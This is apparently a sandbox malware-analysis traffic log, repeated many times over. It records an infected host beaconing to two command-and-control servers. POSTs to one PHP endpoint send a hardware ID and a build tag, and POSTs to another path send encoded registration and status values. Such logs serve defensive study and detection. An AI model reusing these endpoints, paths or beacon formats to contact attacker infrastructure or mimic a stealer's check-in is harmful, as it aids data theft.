Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEBFHJKJEBFCBFHDAEGHost: 185.215.113.100Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 31 32 36 37 36 39 44 37 33 32 33 36 35 33 31 34 33 38 39 38 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 2d 2d 0d 0a Data Ascii: ------DAEBFHJKJEBFCBFHDAEGContent-Disposition: form-data; name="hwid"E6126769D7323653143898------DAEBFHJKJEBFCBFHDAEGContent-Disposition: form-data; name="build"leva------DAEBFHJKJEBFCBFHDAEG--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEBFHJKJEBFCBFHDAEGHost: 185.215.113.100Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 31 32 36 37 36 39 44 37 33 32 33 36 35 33 31 34 33 38 39 38 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 2d 2d 0d 0a Data Ascii: ------DAEBFHJKJEBFCBFHDAEGContent-Disposition: form-data; name="hwid"E6126769D7323653143898------DAEBFHJKJEBFCBFHDAEGContent-Disposition: form-data; name="build"leva------DAEBFHJKJEBFCBFHDAEG--
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGHCAKKEGCAAFHJJJDBKHost: 185.215.113.100Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 31 32 36 37 36 39 44 37 33 32 33 36 35 33 31 34 33 38 39 38 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 2d 2d 0d 0a Data Ascii: ------EGHCAKKEGCAAFHJJJDBKContent-Disposition: form-data; name="hwid"E6126769D7323653143898------EGHCAKKEGCAAFHJJJDBKContent-Disposition: form-data; name="build"leva------EGHCAKKEGCAAFHJJJDBK--
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJJDHDGDAAKECAKJDAEHost: 185.215.113.100Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 31 32 36 37 36 39 44 37 33 32 33 36 35 33 31 34 33 38 39 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 45 2d 2d 0d 0a Data Ascii: ------KJJJDHDGDAAKECAKJDAEContent-Disposition: form-data; name="hwid"E6126769D7323653143898------KJJJDHDGDAAKECAKJDAEContent-Disposition: form-data; name="build"leva------KJJJDHDGDAAKECAKJDAE--
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 31.41.244.10Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
